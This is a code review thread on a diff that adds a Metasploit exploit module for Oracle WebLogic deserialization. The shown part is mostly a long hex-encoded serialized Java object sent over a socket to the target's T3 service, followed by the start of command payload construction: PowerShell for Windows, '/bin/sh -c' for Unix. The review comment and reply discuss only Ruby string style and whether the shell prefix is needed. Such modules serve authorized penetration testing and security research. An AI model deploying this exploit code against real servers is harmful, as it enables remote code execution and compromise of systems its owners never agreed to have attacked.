modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb

```diff
@@ -0,0 +1,293 @@
+    data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'
+    data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'
+    data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'
+    data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'
+    data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'
+    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
+    data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'
+    data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'
+    data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'
+    data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'
+    data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'
+    data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'
+    data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'
+    data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'
+    data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'
+    data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'
+    data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
+    data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'
+    data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'
+    data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'
+    data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'
+    data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'
+    data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'
+    data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'
+    data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'
+    data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'
+    data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'
+    data << '2d4147444d565155423154362e656883348cd6000000070000'
+
+    data << rport.to_s(16).rjust(4, '0')
+
+    data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'
+    data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'
+    data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'
+    data << '863d1d0000000078'
+
+    sock.put([data].pack('H*'))
+    sleep(1)
+    sock.get_once
+  end
+
+  def send_payload_objdata
+    # payload creation
+    if target.name == 'Windows'
+      pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
+      mycmd = pwrshl.each_byte.map {|b| b.to_s(16)}.join
+    elsif target.name == 'Unix'
+      nix_cmd = payload.encoded
+      nix_cmd.prepend('/bin/sh -c ')
```

Comment:
That's an unusual way of constructing a string. Usually `prepend` is reserved for instances when the variable content is not within our control on the immediately preceding line. Consider:

```ruby
      nix_cmd = "/bin/sh -c #{payload.encoded}"
```

Also, is the `/bin/sh -c` needed?

Reply:
You're right, that's not necessary